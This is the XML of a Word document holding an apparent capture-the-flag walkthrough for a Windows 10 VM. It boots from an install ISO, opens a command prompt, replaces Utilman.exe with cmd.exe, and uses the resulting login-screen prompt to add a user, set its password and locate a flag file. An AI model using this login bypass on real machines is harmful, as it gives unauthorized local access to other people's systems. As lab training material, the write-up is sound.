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91D0" w14:textId="1AB19D2C" w:rsidR="00372431" w:rsidRDefault="00372431">
      <w:r>
        <w:t xml:space="preserve">Have a random Windows 10 .iso file lying around or download it from here: </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00BE28A0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.microsoft.com/en-au/software-download/windows10</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE74F11" w14:textId="77777777" w:rsidR="00372431" w:rsidRDefault="00372431"/>
    <w:p w14:paraId="043EB824" w14:textId="1B206FA3" w:rsidR="00573C48" w:rsidRDefault="00A11C53">
      <w:r>
        <w:t>Click into the VM and spam F2 to interrupt the boot process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4488ED20" w14:textId="3196E0E6" w:rsidR="00B93D0E" w:rsidRDefault="004128B4">
      <w:r w:rsidRPr="004128B4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="186766B1" wp14:editId="1149D7C6">
            <wp:extent cx="5731510" cy="4092575"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="261194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944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8FFA" w14:textId="3B7FB75F" w:rsidR="004128B4" w:rsidRDefault="004128B4">
      <w:r>
        <w:t>Shift f10</w:t>
      </w:r>
      <w:r w:rsidR="00A1561B">
        <w:t xml:space="preserve"> to open command prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB06B6D" w14:textId="3F46721D" w:rsidR="0017604A" w:rsidRDefault="0017604A">
      <w:r w:rsidRPr="0017604A">
        <w:t>wmic logicaldisk get name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABFDB8C" w14:textId="4E0F7CF5" w:rsidR="0017604A" w:rsidRDefault="0017604A">
      <w:r>
        <w:t>C:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017604A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0017604A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E5DE584" wp14:editId="0CEDC8AB">
            <wp:extent cx="5731510" cy="1261110"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1695075794" name="Picture 1" descr="A black screen with a blue str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75794" name="Picture 1" descr="A black screen with a blue strip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3CCF" w14:textId="19F676E5" w:rsidR="0017604A" w:rsidRDefault="0017604A">
      <w:r>
        <w:t>dir /s /b /a *flag*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294FCB79" w14:textId="3A1388EE" w:rsidR="0017604A" w:rsidRDefault="006F3FE7">
      <w:r w:rsidRPr="006F3FE7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A78E123" wp14:editId="70A2DA94">
            <wp:extent cx="5731510" cy="889635"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="18366981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98109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CDE1" w14:textId="78A237E6" w:rsidR="00573C48" w:rsidRDefault="006D14C6">
      <w:r>
        <w:t>cd Windows/System32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024765E0" w14:textId="22C65236" w:rsidR="006D14C6" w:rsidRDefault="006D14C6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>copy cmd.exe Utilman.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527BD6E3" w14:textId="09A0E319" w:rsidR="006D14C6" w:rsidRDefault="006D14C6">
      <w:r w:rsidRPr="006D14C6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26D4A933" wp14:editId="476BCA0A">
            <wp:extent cx="3820058" cy="1181265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34946091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60917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DF97" w14:textId="32A8533B" w:rsidR="0031299A" w:rsidRDefault="00780289">
      <w:r>
        <w:t>Click on utilman icon</w:t>
      </w:r>
      <w:r w:rsidR="00EB7B2B">
        <w:t xml:space="preserve"> (which opens cmd.exe instead)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8DD4D3" w14:textId="6C6BFA87" w:rsidR="006F3FE7" w:rsidRDefault="006F3FE7">
      <w:r w:rsidRPr="006F3FE7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14A36B7A" wp14:editId="26D050A6">
            <wp:extent cx="5731510" cy="4588510"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="513417786" name="Picture 1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17786" name="Picture 1" descr="A computer screen with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F8DE" w14:textId="2383EAFF" w:rsidR="007273CA" w:rsidRDefault="007273CA">
      <w:r>
        <w:t>Be fast and click the Utilman icon (beside Power icon) to open a command prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C364A7" w14:textId="77777777" w:rsidR="00D563F7" w:rsidRDefault="00D563F7" w:rsidP="00D563F7">
      <w:r>
        <w:t>net user /add james</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DAED04" w14:textId="6F47E39F" w:rsidR="00D563F7" w:rsidRDefault="00D563F7">
      <w:r>
        <w:t>net user james password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795EB8C5" w14:textId="4514C5AE" w:rsidR="005B220B" w:rsidRDefault="006F3FE7">
      <w:r w:rsidRPr="006F3FE7">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="763FFB1B" wp14:editId="7E392AC5">
            <wp:extent cx="5731510" cy="2063115"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1801797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7977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A184" w14:textId="4B556C18" w:rsidR="00D563F7" w:rsidRDefault="00D563F7">
      <w:r>
        <w:t>This changes the password of james</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ADD0BB" w14:textId="0510185F" w:rsidR="00372431" w:rsidRDefault="00372431">
      <w:r w:rsidRPr="00372431">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F4362EF" wp14:editId="07276EFF">
            <wp:extent cx="5731510" cy="4270375"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="685386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863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A344" w14:textId="482A808C" w:rsidR="00372431" w:rsidRDefault="00372431">
      <w:r>
        <w:t>Now navigate to the path, view hidden items and change the file extension to view the flag!</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00372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F6"/>
    <w:rsid w:val="0017604A"/>
    <w:rsid w:val="00230036"/>
    <w:rsid w:val="002A05D5"/>
    <w:rsid w:val="0031299A"/>
    <w:rsid w:val="00372431"/>
    <w:rsid w:val="004128B4"/>
    <w:rsid w:val="00540F0E"/>
    <w:rsid w:val="00573C48"/>
    <w:rsid w:val="005B220B"/>
    <w:rsid w:val="006D14C6"/>
    <w:rsid w:val="006F3FE7"/>
    <w:rsid w:val="007273CA"/>
    <w:rsid w:val="00780289"/>
    <w:rsid w:val="008D6AC1"/>
    <w:rsid w:val="00A11C53"/>
    <w:rsid w:val="00A1561B"/>
    <w:rsid w:val="00B93D0E"/>
    <w:rsid w:val="00D563F7"/>
    <w:rsid w:val="00EB7B2B"/>
    <w:rsid w:val="00EE5317"/>
    <w:rsid w:val="00FD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77130"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1371CB0A-1D05-4845-857B-0E10A53C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4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icrosoft.com/en-au/software-download/windows1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Dalbert Chea Zhi Jun /CSF</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Dalbert Chea Zhi Jun /CSF</cp:lastModifiedBy>
  <cp:revision>16</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-17T17:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-17T19:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>